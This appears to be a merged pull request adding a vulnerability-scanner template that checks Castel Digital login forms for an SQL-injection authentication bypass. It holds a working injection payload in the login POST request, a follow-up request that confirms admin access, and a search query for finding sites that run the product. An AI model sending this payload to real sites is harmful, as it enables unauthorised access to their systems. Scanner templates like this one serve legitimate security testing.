Merge pull request #9785 from Kazgangap/castel

Castel Digital Authentication Bypass
2024-05-15 13:45:25 +05:30 · 2024-05-15 13:45:25 +05:30 · 3765efa3db
parent 611a91dd16 d866333971
commit 3765efa3db
1 changed files with 42 additions and 0 deletions
--- a/http/vulnerabilities/other/castel-digital-sqli.yaml
+++ b/http/vulnerabilities/other/castel-digital-sqli.yaml
@ -0,0 +1,42 @@
+id: castel-digital-sqli
+
+info:
+  name: Castel Digital - Authentication Bypass
+  author: Kazgangap
+  severity: high
+  description: |
+    SQL Injection vulnerability in Castel Digital login forms.
+  reference:
+    - https://www.casteldigital.com.br/
+    - https://cxsecurity.com/issue/WLB-2024050032
+  metadata:
+    verified: true
+    max-request: 2
+    google-query: "Castel Digital"
+  tags: sqli,auth-bypass,castel
+
+http:
+  - raw:
+      - |
+        POST /restrito/login/sub/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
+
+      - |
+        GET /restrito/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "Banner"
+          - "Construtoras"
+        condition: and
+
+      - type: status
+        status:
+          - 200